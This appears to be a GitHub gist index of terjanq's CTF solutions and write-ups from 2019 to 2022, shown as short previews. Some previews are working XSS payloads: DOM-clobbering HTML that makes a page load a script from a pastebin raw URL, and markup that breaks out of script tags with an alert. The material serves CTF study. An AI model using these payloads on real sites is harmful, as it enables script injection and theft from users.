terjanq

terjanq / solution-214.html
Created September 23, 2019 20:38
XSS Challenge DOM Clobbering
<!-- Solution 214 - with a strange behaviour in browsers (remove new lines) -->
<a href=//pastebin.com/how-can-i-escape-this%2f..%2fraw/LiE18yqs? id=testPath name=protocol>
<form id=CONFIG>
<img id=test>
<a>
terjanq / solution-212.html
Last active September 24, 2019 13:36
XSS Challenge DOM Clobbering
<!-- Solution 212! (remove new lines) -->
<a id=CONFIG name=test>
<p>
<a href=//pastebin.com/how-can-i-escape-this%2f..%2fraw/LiE18yqs? id=testPath name=protocol>
<p>
T
terjanq / solution-225.html
Last active September 25, 2019 10:25
XSS Challenge DOM Clobbering
<!-- 225 char solution (remove new lines) -->
<a href=//pastebin.com/how-can-i-escape-this%2f..%2fraw/LiE18yqs? id=testPath name=protocol>
<form id=CONFIG>
<img id=testPath name=test>
terjanq / car_repair.js
Created October 24, 2019 12:15
Solutions from hacklu 2019 CTF
/*
* This is a solution to "Car repair shop" challenge from hack.lu ctf 2019
* Solves: 9
* 10/23/2019 © by terjanq
*/
/* The idea of the solution is: */
function WoW(){ this.Oo = 'O.o'; }
var x = new WoW();
terjanq / writeupBin_for_bots.py
Created December 29, 2019 20:24
Payload to WriteupBin hxp2019 CTF
from flask import Flask
import time
import requests
import os
import re
import sys
app = Flask(__name__)
terjanq / part1.py
Last active April 20, 2020 18:21
Stegasaurus Scratch solution (PlaidCTF 2020)
# The solution comes from the paper https://sci-hub.tw/10.1007/BF03025305
# Which I got from p4 team.
import random
from math import factorial
SET_SIZE = 8
MAX_VAL = 40000
# get random 8 integers
terjanq / scriptless_solve.html
Last active June 13, 2020 19:30
Solution to Scriptless challenge from Pwn2win 2020 CTF
<body>
</body>
<script>
/*
Quasi-scriptless (3 solves)
terjanq / writeup.md
Last active May 20, 2021 01:43
Politer Note - writeup

Write-up

Solution

<a id=bad1 href='cid:="</div">'>
<a id=good1 href="cid:></script><iframe srcdoc='$'">

<a id=bad2 href="http://politernotepad.zajebistyc.tf/static/badwords.js">
<a id=good2 href='data:,alert(/greetings from terjanq/)"></script>'>
terjanq / README.md
Last active October 23, 2021 14:18
TokyoWesterns CTF 2020 | writeups by @terjanq

Urlcheck v1 (98 points, 160 solves)

The goal was to bypass WAF protection to access local resources.

app.re_ip = re.compile('\A(\d+)\.(\d+)\.(\d+)\.(\d+)\Z')

def valid_ip(ip):
 matches = app.re_ip.match(ip)
terjanq / secdriven.md
Last active June 18, 2022 11:58
A TL;DR solution to Security Driven by @terjanq

For this year's Google CTF, I prepared a challenge that is based on a real-world vulnerability. The challenge wasn't solved by any team during the competition, so here is the proof that the challenge was in fact solvable! :)

The goal of the challenge was to send a malicious file to the admin and leak their file with a flag. The ID of the file was embedded into the challenge description (/file?id=133711377731) and only the admin had access to it, because the file was private.

Disclaimer: The write-up was written on an airplane, therefore its quality is poor; it is mostly meant to showcase the required steps to solve the challenge